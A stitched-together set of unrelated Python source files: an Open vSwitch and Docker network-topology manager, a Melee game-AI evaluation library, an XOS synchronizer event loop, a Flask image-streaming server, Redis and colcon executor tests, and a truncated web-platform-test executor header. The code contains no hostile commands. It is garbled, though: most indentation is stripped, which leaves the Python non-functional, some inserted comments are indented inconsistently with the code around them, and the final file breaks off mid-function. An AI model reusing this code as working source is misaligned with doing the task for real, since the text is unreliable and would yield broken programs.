#TODO: add first the node information in the node if required (editing)!!!!!!!!!
def add_edge(t,e):
try:
if t['nodes'][e['src']['id']]['type']=="LC" and t['nodes'][e['dst']['id']]['type']=="LC":
logger.warn("LC to LC edge not supported :(")
elif t['nodes'][e['src']['id']]['type']=="LC":
ibef=check_output(["sudo","ovs-vsctl","list-ifaces",e['dst']['id']]).split("\n")
check_output(['sudo', 'ovs-docker', 'add-port', ''+e['dst']['id']+'', e['src']['intf'], ''+e['src']['id']+'', '--ipaddress='+t['nodes'][e['src']['id']]['intf'][e['src']['intf']]['ip']+'/24'])
iaft=check_output(["sudo","ovs-vsctl","list-ifaces",e['dst']['id']]).split("\n")
pname=list(set(iaft) - set(ibef))[0]
port=str(json.loads(check_output(["sudo","ovs-vsctl","--columns=ofport","--format=json","list","interface", pname]))["data"][0][0])
t['nodes'][e['src']['id']]['intf'][e['src']['intf']]['attpoint']=t['nodes'][e['dst']['id']]['dpid']+"|"+port
mac=""
try:
mac=check_output(["./get_intf_mac.sh",e['src']['id'],e['src']['intf']])[:-1]
except:
print "mac not found..."
t['nodes'][e['src']['id']]['intf'][e['src']['intf']]["mac"]=mac
info=docky.exec_create(e['src']['id'],"ping "+t['nodes'][e['src']['id']]['intf'][e['src']['intf']]['gw']+" -c 5")
exid=info['Id']
docky.exec_start(exid,detach=True)
#print ["sudo", "ovs-vsctl","set", "port", pname, "tag="+e['src']['vlan']]
if "vlan" in e['src'].keys():
check_output(["sudo", "ovs-vsctl","set", "port", pname, "tag="+e['src']['vlan']])
elif t['nodes'][e['dst']['id']]['type']=="LC":
ibef=check_output(["sudo","ovs-vsctl","list-ifaces",e['src']['id']]).split("\n")
check_output(['sudo', 'ovs-docker', 'add-port', ''+e['src']['id']+'', e['dst']['intf'], ''+e['dst']['id']+'', '--ipaddress='+t['nodes'][e['dst']['id']]['intf'][e['dst']['intf']]['ip']+'/24'])
iaft=check_output(["sudo","ovs-vsctl","list-ifaces",e['src']['id']]).split("\n")
pname=list(set(iaft) - set(ibef))[0]
port=str(json.loads(check_output(["sudo","ovs-vsctl","--columns=ofport","--format=json","list","interface", pname]))["data"][0][0])
t['nodes'][e['dst']['id']]['intf'][e['dst']['intf']]['attpoint']=t['nodes'][e['src']['id']]['dpid']+"|"+port
mac=""
try:
mac=check_output(["./get_intf_mac.sh",e['dst']['id'],e['dst']['intf']])[:-1]
except:
print "mac not found..."
t['nodes'][e['dst']['id']]['intf'][e['dst']['intf']]["mac"]=mac
info=docky.exec_create(e['dst']['id'],"ping "+t['nodes'][e['dst']['id']]['intf'][e['dst']['intf']]['gw']+" -c 5")
exid=info['Id']
docky.exec_start(exid,detach=True)
#print ["sudo", "ovs-vsctl","set", "port", pname, "tag="+e['dst']['vlan']]
if "vlan" in e['dst'].keys():
check_output(["sudo", "ovs-vsctl","set", "port", pname, "tag="+e['dst']['vlan']])
elif t['nodes'][e['src']['id']]['type']=="OVS" and t['nodes'][e['dst']['id']]['type']=="OVS":
check_output(["sudo", "ovs-vsctl", "add-port", e['src']['id'], "from_"+e['src']['id']+"_to_"+e['dst']['id']])
check_output(["sudo", "ovs-vsctl", "add-port", e['dst']['id'], "from_"+e['dst']['id']+"_to_"+e['src']['id']])
check_output(["sudo","ovs-vsctl", "set", "interface", "from_"+e['src']['id']+"_to_"+e['dst']['id'], "type=patch", "options:peer="+"from_"+e['dst']['id']+"_to_"+e['src']['id']])
check_output(["sudo","ovs-vsctl", "set", "interface", "from_"+e['dst']['id']+"_to_"+e['src']['id'], "type=patch", "options:peer="+"from_"+e['src']['id']+"_to_"+e['dst']['id']])
else:
logger.warn("Link error: Technologies not found")
except:
logger.warn("Error adding edge: "+json.dumps(e))
logger.warn(traceback.format_exc())
def del_edge(t,e):
try:
if t['nodes'][e['src']['id']]['type']=="LC" and t['nodes'][e['dst']['id']]['type']=="LC":
logger.warn("LC to LC edge not supported :(")
elif t['nodes'][e['src']['id']]['type']=="LC":
check_output(['sudo', 'ovs-docker', 'del-port', ''+e['dst']['id']+'', e['src']['intf'], ''+e['src']['id']+'', '--ipaddress='+t['nodes'][e['src']['id']]['intf'][e['src']['intf']]['ip']+'/24'])
elif t['nodes'][e['dst']['id']]['type']=="LC":
check_output(['sudo', 'ovs-docker', 'del-port', ''+e['src']['id']+'', e['dst']['intf'], ''+e['dst']['id']+'', '--ipaddress='+t['nodes'][e['dst']['id']]['intf'][e['dst']['intf']]['ip']+'/24'])
elif t['nodes'][e['src']['id']]['type']=="OVS" and t['nodes'][e['dst']['id']]['type']=="OVS":
check_output(["sudo", "ovs-vsctl", "del-port", e['src']['id'], "from_"+e['src']['id']+"_to_"+e['dst']['id']])
check_output(["sudo", "ovs-vsctl", "del-port", e['dst']['id'], "from_"+e['dst']['id']+"_to_"+e['src']['id']])
else:
logger.warn("Link error: Technologies not found")
except:
logger.warn("Error adding edge: "+json.dumps(e))
def del_node(t,n):
try:
if n['type']=="OVS":
tobedel=[]
for e in t['edges']:
if n['id'] in [e['src']['id'],e['dst']['id']]:
print "DELETING EDGE!!!"+json.dumps(e)
del_edge(t,e)
tobedel.append(e)
for e in tobedel:
if t['nodes'][e['src']['id']]['type']=="LC":
del t['nodes'][e['src']['id']]['intf'][e['src']['intf']]
if t['nodes'][e['dst']['id']]['type']=="LC":
del t['nodes'][e['dst']['id']]['intf'][e['dst']['intf']]
t['edges'].remove(e)
check_output(["sudo","ovs-vsctl","del-br",n['id']])
elif n['type']=="LC":
tobedel=[]
for e in t['edges']:
if n['id'] in [e['src']['id'],e['dst']['id']]:
del_edge(t,e)
tobedel.append(e)
for e in tobedel:
if t['nodes'][e['src']['id']]['type']=="LC":
del t['nodes'][e['src']['id']]['intf'][e['src']['intf']]
if t['nodes'][e['dst']['id']]['type']=="LC":
del t['nodes'][e['dst']['id']]['intf'][e['dst']['intf']]
t['edges'].remove(e)
docky.stop(n['id'])
docky.remove_container(n['id'])
except:
print n
logger.warn("Error deleting node: "+n['id'])
def add_controller(t,ip, switch):
check_output(["sudo","ovs-vsctl","set-controller",switch,"tcp:"+ip+":6633"])
'''
for n in t['nodes'].keys():
if t['nodes'][n]['type']=="OVS":
try:
check_output(["sudo","ovs-vsctl","set-controller",n,"tcp:"+ip+":6633"])
except:
logger.warn("Error adding controller to "+n)
'''
t['nodes'][switch]['controller']=ip
#t['controller']={"ip":ip}
def create_topology_from_data(t):
#It's assumed that at this point the topology has been checked through "validate_input_data(t)"
for k in t['nodes'].keys():
add_node(t,t['nodes'][k])
for e in t['edges']:
add_edge(t,e)
for k in t['nodes'].keys():
if "controller" in t['nodes'][k].keys():
add_controller(t,t['nodes'][k]['controller'], k)
i=0
if "attachPoints" in t.keys():
for ap in t['attachPoints']:
try:
check_output(["sudo","ovs-vsctl","add-port",ap['switch'],ap['interface']])
i+=1
except:
logger.warn("Error adding attachment point: "+json.dumps(ap))
del t['attachPoints'][i]
if "vxlantunnel" in t.keys():
for ap in t['vxlantunnel']:
try:
vni=""
if "vni" in ap.keys(): vni=ap["vni"]
else: vni="flow"
check_output(["sudo","ovs-vsctl","add-port",ap['switch'],ap['port'],"--","set","interface",ap['port'],"type=vxlan","options:remote_ip="+ap['remote'],"options:key="+vni])
i+=1
except:
logger.warn("Error adding tunnel point: "+json.dumps(ap))
del t['vxlantunnel'][i]
if "gretunnel" in t.keys():
for ap in t['gretunnel']:
try:
check_output(["sudo","ovs-vsctl","add-port",ap['switch'],ap['port'],"--","set","interface",ap['port'],"type=gre","options:remote_ip="+ap['remote']])
i+=1
except:
logger.warn("Error adding tunnel point: "+json.dumps(ap))
del t['gretunnel'][i]
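# Hypothetical example of the topology dict consumed by create_topology_from_data,
# inferred from how add_node/add_edge index it; the names and addresses below are
# illustrative only.
example_topology = {
    "nodes": {
        "br1": {"id": "br1", "type": "OVS", "stp": False, "controller": "10.0.0.1"},
        "c1": {"id": "c1", "type": "LC", "image": "ubuntu",
               "intf": {"eth1": {"ip": "192.168.0.2", "gw": "192.168.0.1"}}},
    },
    "edges": [
        {"src": {"id": "c1", "intf": "eth1", "vlan": "10"}, "dst": {"id": "br1"}},
    ],
    # Optional sections handled at the end of create_topology_from_data:
    # "attachPoints": [{"switch": "br1", "interface": "eth2"}],
    # "vxlantunnel": [{"switch": "br1", "port": "vx1", "remote": "10.0.0.2", "vni": "100"}],
    # "gretunnel": [{"switch": "br1", "port": "gre1", "remote": "10.0.0.2"}],
}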
def get_stats():
    stop = True
while (stop):
try:
stts['stats'] = json.loads(check_output(["./get_stats.sh"]))
except ValueError:
print "ERROR GATHERING STATS"
time.sleep(5)
import threading
processThread = threading.Thread(target=get_stats, args=())
processThread.start()
dnet=load_state()
if dnet=={}:
dnet={"nodes":{}, "edges":[]}
|
eval_lib.py
|
import functools
import multiprocessing as mp
from typing import Callable, Mapping, NamedTuple, Tuple
import numpy as np
import tensorflow as tf
import melee
from slippi_ai import embed, policies, data, saving, dolphin
expected_players = (1, 2)
class Policy(NamedTuple):
sample: Callable[
[data.CompressedGame, policies.RecurrentState],
Tuple[policies.ControllerWithRepeat, policies.RecurrentState]]
initial_state: Callable[[int], policies.RecurrentState]
@staticmethod
def from_saved_model(path: str) -> "Policy":
policy = tf.saved_model.load(path)
return Policy(
sample=lambda *structs: policy.sample(*tf.nest.flatten(structs)),
initial_state=policy.initial_state)
@staticmethod
def from_experiment(tag: str, sample_kwargs=None) -> "Policy":
policy = saving.load_policy(tag)
sample_kwargs = sample_kwargs or {}
sample = functools.partial(policy.sample, **sample_kwargs)
return Policy(
sample=tf.function(sample),
# sample=sample,
initial_state=policy.initial_state)
def send_controller(controller: melee.Controller, controller_state: dict):
for b in embed.LEGAL_BUTTONS:
if controller_state['button'][b.value]:
controller.press_button(b)
else:
controller.release_button(b)
main_stick = controller_state["main_stick"]
controller.tilt_analog(melee.Button.BUTTON_MAIN, *main_stick)
c_stick = controller_state["c_stick"]
controller.tilt_analog(melee.Button.BUTTON_C, *c_stick)
controller.press_shoulder(melee.Button.BUTTON_L, controller_state["l_shoulder"])
controller.press_shoulder(melee.Button.BUTTON_R, controller_state["r_shoulder"])
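# For reference, send_controller expects a dict shaped like the sampled policy
# output, e.g. (stick/shoulder values are illustrative neutral positions):
#   {
#       'button': {b.value: False for b in embed.LEGAL_BUTTONS},
#       'main_stick': (0.5, 0.5),
#       'c_stick': (0.5, 0.5),
#       'l_shoulder': 0.0,
#       'r_shoulder': 0.0,
#   }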
class Agent:
def __init__(
self,
controller: melee.Controller,
opponent_port: int,
policy: Policy,
):
self._controller = controller
self._port = controller.port
self._players = (self._port, opponent_port)
self._embed_game = embed.make_game_embedding(ports=self._players)
self._policy = policy
self._sample = policy.sample
self._hidden_state = policy.initial_state(1)
self._current_action_repeat = 0
self._current_repeats_left = 0
def step(self, gamestate: melee.GameState):
if self._current_repeats_left > 0:
self._current_repeats_left -= 1
return None
embedded_game = self._embed_game.from_state(gamestate)
# put the players in the expected positions
# embedded_game['player'] = {
# e: embedded_game['player'][p]
# for e, p in zip(expected_players, self._players)}
unbatched_input = data.CompressedGame(embedded_game, self._current_action_repeat, 0.)
batched_input = tf.nest.map_structure(
lambda a: np.expand_dims(a, 0), unbatched_input)
sampled_controller_with_repeat, self._hidden_state = self._sample(
batched_input, self._hidden_state)
sampled_controller_with_repeat = tf.nest.map_structure(
lambda t: np.squeeze(t.numpy(), 0), sampled_controller_with_repeat)
sampled_controller = sampled_controller_with_repeat['controller']
self._current_action_repeat = sampled_controller_with_repeat['action_repeat']
self._current_repeats_left = self._current_action_repeat
send_controller(self._controller, sampled_controller)
return sampled_controller_with_repeat
class Environment(dolphin.Dolphin):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
assert len(self._players) == 2
self._game_embedders = {}
ports = list(self._players)
for port, opponent_port in zip(ports, reversed(ports)):
if isinstance(self._players[port], dolphin.AI):
self._game_embedders[port] = embed.make_game_embedding(
ports=(port, opponent_port))
def step(self, controllers: Mapping[int, dict]):
for port, controller in controllers.items():
send_controller(self.controllers[port], controller)
gamestate = super().step()
return {port: e.from_state(gamestate) for port, e in self._game_embedders.items()}
def run_env(init_kwargs, conn):
env = Environment(**init_kwargs)
while True:
controllers = conn.recv()
if controllers is None:
break
conn.send(env.step(controllers))
env.stop()
conn.close()
class AsyncEnv:
def __init__(self, **kwargs):
self._parent_conn, child_conn = mp.Pipe()
self._process = mp.Process(target=run_env, args=(kwargs, child_conn))
self._process.start()
def stop(self):
self._parent_conn.send(None)
self._process.join()
self._parent_conn.close()
def send(self, controllers):
self._parent_conn.send(controllers)
def recv(self):
return self._parent_conn.recv()
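# Rough usage sketch for AsyncEnv (illustrative; the keyword arguments are
# forwarded to dolphin.Dolphin via Environment and are not spelled out here):
#   env = AsyncEnv(**dolphin_kwargs)        # dolphin_kwargs is hypothetical
#   env.send({port: controller_state})      # one controller dict per AI port
#   gamestates = env.recv()                 # dict of embedded games keyed by port
#   env.stop()                              # tells the child process to exit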
|
event_loop.py
|
import os
import imp
import inspect
import time
import traceback
import commands
import threading
import json
import pdb
from datetime import datetime
from collections import defaultdict
from core.models import *
from django.db.models import F, Q
#from openstack.manager import OpenStackManager
from openstack.driver import OpenStackDriver
from xos.logger import Logger, logging, logger
#from timeout import timeout
from xos.config import Config, XOS_DIR
from synchronizers.base.steps import *
from syncstep import SyncStep
from toposort import toposort
from synchronizers.base.error_mapper import *
debug_mode = False
logger = Logger(level=logging.INFO)
class StepNotReady(Exception):
pass
class NoOpDriver:
def __init__(self):
self.enabled = True
self.dependency_graph = None
STEP_STATUS_WORKING=1
STEP_STATUS_OK=2
STEP_STATUS_KO=3
def invert_graph(g):
ig = {}
for k,v in g.items():
for v0 in v:
try:
ig[v0].append(k)
except:
                ig[v0] = [k]
return ig
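# Example: invert_graph({'a': ['b', 'c']}) returns {'b': ['a'], 'c': ['a']};
# it is used below to build the deletion dependency graph from the sync graph.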
class XOSObserver:
#sync_steps = [SyncNetworks,SyncNetworkInstances,SyncSites,SyncSitePrivilege,SyncSlices,SyncSliceMemberships,SyncInstances,SyncInstanceIps,SyncExternalRoutes,SyncUsers,SyncRoles,SyncNodes,SyncImages,GarbageCollector]
sync_steps = []
def __init__(self):
# The Condition object that gets signalled by Feefie events
self.step_lookup = {}
self.load_sync_step_modules()
self.load_sync_steps()
self.event_cond = threading.Condition()
self.driver_kind = getattr(Config(), "observer_driver", "openstack")
if self.driver_kind=="openstack":
self.driver = OpenStackDriver()
else:
self.driver = NoOpDriver()
def wait_for_event(self, timeout):
self.event_cond.acquire()
self.event_cond.wait(timeout)
self.event_cond.release()
def wake_up(self):
logger.info('Wake up routine called. Event cond %r'%self.event_cond)
self.event_cond.acquire()
self.event_cond.notify()
self.event_cond.release()
def load_sync_step_modules(self, step_dir=None):
if step_dir is None:
if hasattr(Config(), "observer_steps_dir"):
step_dir = Config().observer_steps_dir
else:
step_dir = XOS_DIR + "/observer/steps"
for fn in os.listdir(step_dir):
pathname = os.path.join(step_dir,fn)
if os.path.isfile(pathname) and fn.endswith(".py") and (fn!="__init__.py"):
module = imp.load_source(fn[:-3],pathname)
for classname in dir(module):
c = getattr(module, classname, None)
# make sure 'c' is a descendent of SyncStep and has a
# provides field (this eliminates the abstract base classes
# since they don't have a provides)
if inspect.isclass(c) and issubclass(c, SyncStep) and hasattr(c,"provides") and (c not in self.sync_steps):
self.sync_steps.append(c)
logger.info('loaded sync steps: %s' % ",".join([x.__name__ for x in self.sync_steps]))
# print 'loaded sync steps: %s' % ",".join([x.__name__ for x in self.sync_steps])
def load_sync_steps(self):
dep_path = Config().observer_dependency_graph
logger.info('Loading model dependency graph from %s' % dep_path)
try:
# This contains dependencies between records, not sync steps
self.model_dependency_graph = json.loads(open(dep_path).read())
except Exception,e:
raise e
try:
backend_path = Config().observer_pl_dependency_graph
logger.info('Loading backend dependency graph from %s' % backend_path)
# This contains dependencies between backend records
self.backend_dependency_graph = json.loads(open(backend_path).read())
except Exception,e:
logger.info('Backend dependency graph not loaded')
# We can work without a backend graph
self.backend_dependency_graph = {}
provides_dict = {}
for s in self.sync_steps:
self.step_lookup[s.__name__] = s
for m in s.provides:
try:
provides_dict[m.__name__].append(s.__name__)
except KeyError:
provides_dict[m.__name__]=[s.__name__]
step_graph = {}
for k,v in self.model_dependency_graph.iteritems():
try:
for source in provides_dict[k]:
for m in v:
try:
for dest in provides_dict[m]:
# no deps, pass
try:
if (dest not in step_graph[source]):
step_graph[source].append(dest)
except:
step_graph[source]=[dest]
except KeyError:
pass
except KeyError:
pass
# no dependencies, pass
#import pdb
#pdb.set_trace()
if (self.backend_dependency_graph):
backend_dict = {}
for s in self.sync_steps:
for m in s.serves:
backend_dict[m]=s.__name__
            for k,v in self.backend_dependency_graph.iteritems():
try:
source = backend_dict[k]
                    for m in v:
                        try:
                            dest = backend_dict[m]
                        except KeyError:
                            # no deps, skip this entry
                            continue
                        try:
                            if (dest not in step_graph[source]):
                                step_graph[source].append(dest)
                        except KeyError:
                            step_graph[source] = [dest]
except KeyError:
pass
# no dependencies, pass
self.dependency_graph = step_graph
self.deletion_dependency_graph = invert_graph(step_graph)
self.ordered_steps = toposort(self.dependency_graph, map(lambda s:s.__name__,self.sync_steps))
print "Order of steps=",self.ordered_steps
self.load_run_times()
def check_duration(self, step, duration):
try:
if (duration > step.deadline):
logger.info('Sync step %s missed deadline, took %.2f seconds'%(step.name,duration))
except AttributeError:
            # step doesn't have a deadline
pass
def update_run_time(self, step, deletion):
if (not deletion):
self.last_run_times[step.__name__]=time.time()
else:
self.last_deletion_run_times[step.__name__]=time.time()
def check_schedule(self, step, deletion):
last_run_times = self.last_run_times if not deletion else self.last_deletion_run_times
time_since_last_run = time.time() - last_run_times.get(step.__name__, 0)
try:
if (time_since_last_run < step.requested_interval):
raise StepNotReady
except AttributeError:
logger.info('Step %s does not have requested_interval set'%step.__name__)
raise StepNotReady
def load_run_times(self):
try:
jrun_times = open('/tmp/observer_run_times').read()
self.last_run_times = json.loads(jrun_times)
except:
self.last_run_times={}
for e in self.ordered_steps:
self.last_run_times[e]=0
try:
jrun_times = open('/tmp/observer_deletion_run_times').read()
self.last_deletion_run_times = json.loads(jrun_times)
except:
self.last_deletion_run_times={}
for e in self.ordered_steps:
self.last_deletion_run_times[e]=0
def save_run_times(self):
run_times = json.dumps(self.last_run_times)
open('/tmp/observer_run_times','w').write(run_times)
deletion_run_times = json.dumps(self.last_deletion_run_times)
open('/tmp/observer_deletion_run_times','w').write(deletion_run_times)
def check_class_dependency(self, step, failed_steps):
        step.dependencies = []
        for obj in step.provides:
            step.dependencies.extend(self.model_dependency_graph.get(obj.__name__, []))
for failed_step in failed_steps:
if (failed_step in step.dependencies):
raise StepNotReady
def sync(self, S, deletion):
step = self.step_lookup[S]
start_time=time.time()
dependency_graph = self.dependency_graph if not deletion else self.deletion_dependency_graph
# Wait for step dependencies to be met
try:
deps = self.dependency_graph[S]
has_deps = True
except KeyError:
has_deps = False
if (has_deps):
for d in deps:
cond = self.step_conditions[d]
cond.acquire()
if (self.step_status[d] is STEP_STATUS_WORKING):
cond.wait()
cond.release()
go = self.step_status[d] == STEP_STATUS_OK
else:
go = True
if (not go):
            self.failed_steps.append(step)
my_status = STEP_STATUS_KO
else:
sync_step = step(driver=self.driver,error_map=self.error_mapper)
sync_step.__name__ = step.__name__
sync_step.dependencies = []
try:
mlist = sync_step.provides
for m in mlist:
sync_step.dependencies.extend(self.model_dependency_graph[m.__name__])
except KeyError:
pass
sync_step.debug_mode = debug_mode
should_run = False
try:
# Various checks that decide whether
# this step runs or not
self.check_class_dependency(sync_step, self.failed_steps) # dont run Slices if Sites failed
self.check_schedule(sync_step, deletion) # dont run sync_network_routes if time since last run < 1 hour
should_run = True
except StepNotReady:
logging.info('Step not ready: %s'%sync_step.__name__)
self.failed_steps.append(sync_step)
my_status = STEP_STATUS_KO
except Exception,e:
logging.error('%r',e)
logger.log_exc("sync step failed: %r. Deletion: %r"%(sync_step,deletion))
self.failed_steps.append(sync_step)
my_status = STEP_STATUS_KO
if (should_run):
try:
duration=time.time() - start_time
logger.info('Executing step %s' % sync_step.__name__)
failed_objects = sync_step(failed=list(self.failed_step_objects), deletion=deletion)
self.check_duration(sync_step, duration)
if failed_objects:
self.failed_step_objects.update(failed_objects)
my_status = STEP_STATUS_OK
self.update_run_time(sync_step,deletion)
except Exception,e:
logging.error('Model step failed. This seems like a misconfiguration or bug: %r. This error will not be relayed to the user!',e)
logger.log_exc(e)
self.failed_steps.append(S)
my_status = STEP_STATUS_KO
else:
my_status = STEP_STATUS_OK
try:
my_cond = self.step_conditions[S]
my_cond.acquire()
self.step_status[S]=my_status
my_cond.notify_all()
my_cond.release()
except KeyError,e:
            logging.info('Step %r is a leaf', S)
pass
def run(self):
if not self.driver.enabled:
return
if (self.driver_kind=="openstack") and (not self.driver.has_openstack):
return
while True:
try:
error_map_file = getattr(Config(), "error_map_path", XOS_DIR + "/error_map.txt")
self.error_mapper = ErrorMapper(error_map_file)
# Set of whole steps that failed
self.failed_steps = []
# Set of individual objects within steps that failed
self.failed_step_objects = set()
# Set up conditions and step status
# This is needed for steps to run in parallel
# while obeying dependencies.
providers = set()
for v in self.dependency_graph.values():
if (v):
providers.update(v)
self.step_conditions = {}
self.step_status = {}
for p in list(providers):
self.step_conditions[p] = threading.Condition()
self.step_status[p] = STEP_STATUS_WORKING
logger.info('Waiting for event')
tBeforeWait = time.time()
self.wait_for_event(timeout=30)
logger.info('Observer woke up')
# Two passes. One for sync, the other for deletion.
for deletion in [False,True]:
threads = []
logger.info('Deletion=%r...'%deletion)
schedule = self.ordered_steps if not deletion else reversed(self.ordered_steps)
for S in schedule:
thread = threading.Thread(target=self.sync, args=(S, deletion))
logger.info('Deletion=%r...'%deletion)
threads.append(thread)
# Start threads
for t in threads:
t.start()
# Wait for all threads to finish before continuing with the run loop
for t in threads:
t.join()
self.save_run_times()
except Exception, e:
logging.error('Core error. This seems like a misconfiguration or bug: %r. This error will not be relayed to the user!',e)
logger.log_exc("Exception in observer run loop")
traceback.print_exc()
|
image_app_core.py
|
import time
from multiprocessing import Process, Queue
from flask import Flask, render_template, Response, request
app = Flask(__name__)
control_queue = Queue()
display_queue = Queue(maxsize=2)
display_template = 'image_server.html'
@app.route('/')
def index():
return render_template(display_template)
def frame_generator():
while True:
time.sleep(0.05)
encoded_bytes = display_queue.get()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + encoded_bytes + b'\r\n')
@app.route('/display')
def display():
return Response(frame_generator(),
mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/control', methods=['POST'])
def control():
control_queue.put(request.form)
return Response('queued')
def start_server_process(template_name):
"""Start the process, call .terminate to close it"""
global display_template
display_template = template_name
server = Process(target=app.run, kwargs={"host": "0.0.0.0", "port": 5001})
server.start()
return server
def put_output_image(encoded_bytes):
"""Queue an output image"""
if display_queue.empty():
display_queue.put(encoded_bytes)
def get_control_instruction():
if control_queue.empty():
return None
else:
return control_queue.get()
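# Rough usage sketch (illustrative): a behaviour process starts the server, pushes
# encoded JPEG frames and polls for control instructions. encode_frame_to_jpeg_bytes
# and the 'stop' command key are hypothetical and depend on the calling robot code.
#   server = start_server_process('image_server.html')
#   try:
#       while True:
#           put_output_image(encode_frame_to_jpeg_bytes())
#           instruction = get_control_instruction()
#           if instruction and instruction['command'] == 'stop':
#               break
#   finally:
#       server.terminate()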
|
test_base.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import attr
from dm_engine.utils.redis import RedisClient
@attr.s
class A(object):
a = attr.ib(type=str)
b = attr.ib(type=str)
def test_attr():
a = {"a": "a", "b": "b"}
print(A(**a))
def test_redis_ops():
client = RedisClient
client.lpush("xxx", "aaa")
client.lpush("xxx", "bbb")
client.lpush("xxx", "ccc")
assert client.rpop("xxx") == "aaa"
assert client.rpop("xxx") == "bbb"
assert client.rpop("xxx") == "ccc"
assert client.rpop("xxx") is None
client.hset("key1", "aa", "111")
client.hset("key1", "bb", "111")
ret = client.hgetall("key1")
assert type(ret) == dict
# def test_multiprocess_pipe():
#
# conn1, conn2 = multiprocessing.Pipe()
#
# def sender(conn1):
# count = 10
# while count:
# conn1.send(f'[{datetime.now()}] ping::{count}')
# count -= 1
# time.sleep(1)
#
# def receider(conn2):
# count = 10
# while count:
# content = conn2.recv()
# print(f'[{datetime.now()}] {count}, content={content}')
# count -= 1
# time.sleep(2)
#
# p1 = multiprocessing.Process(target=sender, args=(conn1,))
# p2 = multiprocessing.Process(target=receider, args=(conn2,))
# p1.start()
# p2.start()
#
# p1.join()
# p2.join()
#
# conn1.close()
|
test_executor_sequential.py
|
# Copyright 2016-2018 Dirk Thomas
# Licensed under the Apache License, Version 2.0
import asyncio
from collections import OrderedDict
import os
import signal
import sys
from threading import Thread
import time
from colcon_core.executor import Job
from colcon_core.executor import OnError
from colcon_core.executor.sequential import SequentialExecutor
import pytest
ran_jobs = []
class Job1(Job):
def __init__(self):
super().__init__(
identifier='job1', dependencies=set(), task=None,
task_context=None)
async def __call__(self, *args, **kwargs):
global ran_jobs
ran_jobs.append(self.identifier)
class Job2(Job):
def __init__(self):
super().__init__(
identifier='job2', dependencies=set(), task=None,
task_context=None)
async def __call__(self, *args, **kwargs):
return 2
class Job3(Job):
def __init__(self):
super().__init__(
identifier='job3', dependencies=set(), task=None,
task_context=None)
async def __call__(self, *args, **kwargs):
raise RuntimeError('custom exception')
class Job4(Job):
def __init__(self):
super().__init__(
identifier='job4', dependencies=set(), task=None,
task_context=None)
async def __call__(self, *args, **kwargs):
global ran_jobs
ran_jobs.append(self.identifier)
class Job5(Job):
def __init__(self):
super().__init__(
identifier='job5', dependencies=set(), task=None,
task_context=None)
async def __call__(self, *args, **kwargs):
return 5
class Job6(Job):
def __init__(self):
super().__init__(
identifier='job6', dependencies=('job2', ), task=None,
task_context=None)
async def __call__(self, *args, **kwargs):
global ran_jobs
ran_jobs.append(self.identifier)
class Job7(Job):
def __init__(self):
super().__init__(
identifier='job7', dependencies=('job1', ), task=None,
task_context=None)
async def __call__(self, *args, **kwargs):
global ran_jobs
ran_jobs.append(self.identifier)
def test_sequential():
global ran_jobs
extension = SequentialExecutor()
args = None
jobs = OrderedDict()
jobs['one'] = Job1()
# success
rc = extension.execute(args, jobs)
assert rc == 0
assert ran_jobs == ['job1']
ran_jobs.clear()
# return error code
jobs['two'] = Job2()
jobs['four'] = Job4()
rc = extension.execute(args, jobs)
assert rc == 2
assert ran_jobs == ['job1']
ran_jobs.clear()
rc = extension.execute(args, jobs, on_error=OnError.skip_pending)
assert rc == 2
assert ran_jobs == ['job1']
ran_jobs.clear()
# continue after error, keeping first error code
jobs['five'] = Job5()
rc = extension.execute(args, jobs, on_error=OnError.continue_)
assert rc == 2
assert ran_jobs == ['job1', 'job4']
ran_jobs.clear()
# continue but skip downstream
jobs['six'] = Job6()
jobs['seven'] = Job7()
rc = extension.execute(args, jobs, on_error=OnError.skip_downstream)
assert rc == 2
assert ran_jobs == ['job1', 'job4', 'job7']
ran_jobs.clear()
# exception
jobs['two'] = Job3()
rc = extension.execute(args, jobs)
assert rc == 1
assert ran_jobs == ['job1']
ran_jobs.clear()
async def job8():
global ran_jobs
await asyncio.sleep(1)
ran_jobs.append('job8')
def test_sequential_keyboard_interrupt():
global ran_jobs
if 'APPVEYOR' in os.environ:
pytest.skip(
'Skipping keyboard interrupt test since otherwise the prompt '
"'Terminate batch job' blocks the build on AppVeyor")
extension = SequentialExecutor()
args = None
jobs = OrderedDict()
jobs['one'] = Job1()
jobs['aborted'] = job8
jobs['four'] = Job4()
def delayed_sigint():
time.sleep(0.1)
os.kill(
os.getpid(),
signal.SIGINT if sys.platform != 'win32' else signal.CTRL_C_EVENT)
if sys.platform == 'win32':
os.kill(os.getpid(), signal.CTRL_C_EVENT)
thread = Thread(target=delayed_sigint)
try:
thread.start()
rc = extension.execute(args, jobs)
assert rc == signal.SIGINT
finally:
thread.join()
|
base.py
|
import base64
import hashlib
import io
import json
import os
import threading
import traceback
import socket
import sys
from abc import ABCMeta, abstractmethod
from http.client import HTTPConnection
from urllib.parse import urljoin, urlsplit, urlunsplit
from .actions import actions
from .protocol import Protocol, BaseProtocolPart
here = os.path.dirname(__file__)
def executor_kwargs(test_type, server_config, cache_manager, run_info_data,
**kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": server_config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type in ("reftest", "print-reftest"):
